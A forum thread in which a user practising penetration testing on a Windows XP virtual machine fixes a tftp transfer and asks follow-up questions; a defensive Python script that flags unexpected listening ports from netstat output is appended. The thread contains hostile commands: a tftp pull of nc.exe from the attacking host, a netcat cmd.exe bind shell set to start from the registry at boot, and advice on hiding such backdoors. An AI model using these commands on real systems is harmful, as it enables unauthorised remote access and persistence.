Thread: Getting timeout from tftp

  1. #1
    Member
    Join Date
    May 2008
    Posts
    190

    Getting timeout from tftp

    I'm running pentests on my virtual OS, which is running Windows XP SP1. I use fast-track and open a session. Then on my pentesting computer (192.168.1.128) I run start-tftp, which starts a tftp server on port 69. I cp nc.exe into the /tmp dir on that box. Then back on the virtual OS, I run

    tftp -i <192.168.1.128> get nc.exe

    but it returns timeout. I've tried putting full paths and adding a destination full path
    i.e.

    tftp -i 192.168.1.128 get /tmp/nc.exe c:\
    and it returns "c:\ is a directory"

    So I tried

    tftp -i 192.168.1.128 GET nc.exe c:\nc.exe
    and still I got timeout

    I tried just running

    tftp 192.168.1.128

    to see if I can at least establish a connection on that port, but the kernel just returns the usage help text. What's causing the tftp connection to time out? I also tried

    tftp -i 192.168.1.128 PUT xxx
    and still timeout

  2. #2
    Member
    Join Date
    May 2008
    Posts
    190

    I'm thinking maybe it's just buggy because I'm running tftp from a virtual OS.

  3. #3
    Member
    Join Date
    Jan 2010
    Location
    The new forums
    Posts
    462


    Syntax is correct, try renaming nc.exe to "n" for example and see if you can transfer it. Also try restarting the virtual machine. Are you running BT as your main host and winxp as your virtual? I think if the networking is set as "host only" the main OS (BT) can TFTP and ping the vmware network address but not the other way around. So if you are trying to TFTP from your virtual host that would cause a timeout error.

  4. #4
    Member
    Join Date
    May 2008
    Posts
    190


    Got it, lol forgot to put

    sudo start-tftpd

    works like a charm. Yeah, I'm using BT3 as the main host and WinXP Home as the virtual. Thanks. I just started getting in the habit of running a user account full time while pentesting instead of using my root account. It's a pain putting sudo in front of all my commands. Is there a better method?

    Some other questions.

    1. I read somewhere that using tftp to transfer files generates a lot of noise, whereas netcat is a lot quieter. However, you'd have to use tftp at least once to transfer over netcat right? Or am I missing something?

    2. When interacting with a session, is there an end character to end commands running in the session? For instance, if I'm running ping with no set number of how many times to ping, usually I'd hit control - c to end that command, but in this case control - c would end the session. I also know that control - z backgrounds the session, but when I do that and then later come back to that session using sessions -i <id no.> it just hangs.

    3. Why is it that when you open a session and create tftp and netcat connections, the kernel allows the connections? Usually, if you're on a Windows XP desktop and you're about to make a connection, you get a prompt from the Windows firewall asking whether to allow it or not. Why is it that you don't need to verify the connection in these cases? Is it because you're establishing the connections in the cmd, or is it because you have SYSTEM privs?

    4. Is it possible to set up a nc -p 6666 -L -d -e cmd.exe with any sort of authentication? For example, let's say you add this line to the registry to start up every time the box boots. Then that port would be open to anybody who scans the ports and sees that port listening. Is there any way to protect that backdoor from other hackers? What if maybe you set a password for the SYSTEM account, then you use nc -p 23 -L -t -d -e cmd.exe for telnet negotiations. If you use that, will it prompt for a user name and password?

  5. #5

    Quote Originally Posted in #4:
        4. Is it possible to set up a nc -p 6666 -L -d -e cmd.exe with any sort of authentication? For example, let's say you add this line to the registry to start up every time the box boots. Then that port would be open to anybody who scans the ports and sees that port listening. Is there any way to protect that backdoor from other hackers?

    You may want to look into using cryptcat, which can authenticate with a password and also uses encryption so that prying (sniffing) eyes won't capture what you are doing.

    For your "ping" problem, if in linux, use "-c" to specify the number of pings to send. In windows, the default is 5, so it will stop on its own.

    I would also look further into metasploit (I assume you are using this since you mention "sessions -i") about permanent, installed backdoors. You may find something useful there.

    Good Luck...

  6. #6
    Member
    Join Date
    May 2008
    Posts
    190


    Awesome. Going back to the control - c ping thing, what if you're using

    netstat -a 5, where it cycles through all the active connections by page every 5 secs, indefinitely. How could you stop this? Perhaps there is an option to see the netstat -a output page by page? There was nothing in the netstat usage text. I need something like dir /p, but netstat -a /p hehe.

  7. #7

    Probably have to put that into a batch file using a while loop.

    I usually run netstat when I first get on a box, a couple times during my remote session and then right before I disconnect. If you are running a continual netstat, you have lost your ability to run anything else in that shell and I really can't see the reason for getting on the box in the first place if that is all you want to run on it.

    Is there a particular reason you want to run a continual netstat or was it just an example?

  8. #8
    Member
    Join Date
    May 2008
    Posts
    190


    Yes, when I run netstat -a, it outputs so quick that I can't see the beginning output. I want to be able to see all the output.

  9. #9

    Quote Originally Posted by drakoth777:
        Yes, when I run netstat -a, it outputs so quick that I can't see the beginning output. I want to be able to see all the output.

    Code:
    netstat -an | more  (works in windows and linux)

    Also, from experience I have learned to run all my remote shells in a scripted session. That way, I can go back and review what I did and what info was presented later on.

    Good Luck...

  10. #10
    Senior Member secure_it
    Join Date
    Feb 2010
    Location
    Somewhere between the two: BackTrack is 4, FwdTrack4
    Posts
    854

    More specifically:

    netstat -ant (TCP)
    netstat -anu (UDP)
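Posts #9 and #10 give the netstat -an forms for both operating systems but leave the reading of that output to the eye. As an added example (not from the thread or any of its posters), here is a small Python script that parses saved `netstat -an` text in either the Windows or the Linux layout and reports bound ports that are not on an expected-ports list, which is how a defender reviewing a box would notice a stray listener such as the port 6666 shell post #4 worries about. The sample output, the allow lists and the function names (parse_netstat, listening_ports, unexpected_listeners) are all constructed for this example.

```python
"""Audit listening sockets from saved `netstat -an` output (added example).

Handles the two text layouts discussed in the thread: Windows (no Recv-Q /
Send-Q columns, state spelled LISTENING) and Linux (Recv-Q / Send-Q present,
state spelled LISTEN). All sample data below is constructed, not captured.
"""
import re

# Constructed sample in Windows XP `netstat -an` layout.
WINDOWS_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:6666           0.0.0.0:0              LISTENING
  TCP    192.168.1.130:1045     192.168.1.128:445      ESTABLISHED
  UDP    0.0.0.0:445            *:*
  UDP    192.168.1.130:137      *:*
"""

# Constructed sample in Linux `netstat -ant` / `netstat -anu` layout.
LINUX_SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.128:4444      0.0.0.0:*               LISTEN
udp        0      0 0.0.0.0:69              0.0.0.0:*
"""

# Constructed allow lists: (proto, port) pairs the owner expects to see bound.
WINDOWS_EXPECTED = {("tcp", 135), ("tcp", 445), ("udp", 445), ("udp", 137)}
LINUX_EXPECTED = {("tcp", 22), ("tcp", 631)}

# One socket line in either layout. The Recv-Q / Send-Q pair is optional so the
# same pattern covers Windows; the state column is absent for UDP on both.
_SOCKET_RE = re.compile(
    r"^\s*(?P<proto>tcp6?|udp6?)\s+"        # protocol column, any case
    r"(?:\d+\s+\d+\s+)?"                    # Linux Recv-Q and Send-Q
    r"(?P<local>\S+)\s+(?P<foreign>\S+)"    # local and foreign address
    r"(?:\s+(?P<state>\S+))?\s*$",          # TCP state, if any
    re.IGNORECASE,
)


def parse_netstat(text):
    """Return one dict per socket line; header and blank lines are skipped."""
    sockets = []
    for line in text.splitlines():
        m = _SOCKET_RE.match(line)
        if not m:
            continue
        # rsplit keeps IPv6 literals such as [::]:135 intact.
        local_host, local_port = m.group("local").rsplit(":", 1)
        sockets.append({
            "proto": m.group("proto").lower().rstrip("6"),  # tcp6 -> tcp
            "local_host": local_host,
            "local_port": int(local_port),
            "foreign": m.group("foreign"),
            "state": (m.group("state") or "").upper(),
        })
    return sockets


def listening_ports(sockets):
    """(proto, port) pairs that accept inbound traffic.

    TCP counts only in LISTEN/LISTENING; any bound UDP socket counts, because
    UDP has no connection state to distinguish a server from a client.
    """
    bound = set()
    for s in sockets:
        if s["proto"] == "tcp" and s["state"] in ("LISTEN", "LISTENING"):
            bound.add((s["proto"], s["local_port"]))
        elif s["proto"] == "udp":
            bound.add((s["proto"], s["local_port"]))
    return bound


def unexpected_listeners(text, expected):
    """Bound ports not on the allow list, sorted for a stable report."""
    return sorted(listening_ports(parse_netstat(text)) - set(expected))


if __name__ == "__main__":
    for name, text, expected in (("windows", WINDOWS_SAMPLE, WINDOWS_EXPECTED),
                                 ("linux", LINUX_SAMPLE, LINUX_EXPECTED)):
        for proto, port in unexpected_listeners(text, expected):
            print(f"{name}: unexpected {proto} listener on port {port}")
```

Run it against real output by saving `netstat -an > netstat.txt` on the host being reviewed and passing the file contents to unexpected_listeners with an allow list built from that host's known services; the point of the allow list is that a new listener stands out even when the full `netstat -a` output scrolls past too fast to read, which was the original complaint in post #8.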
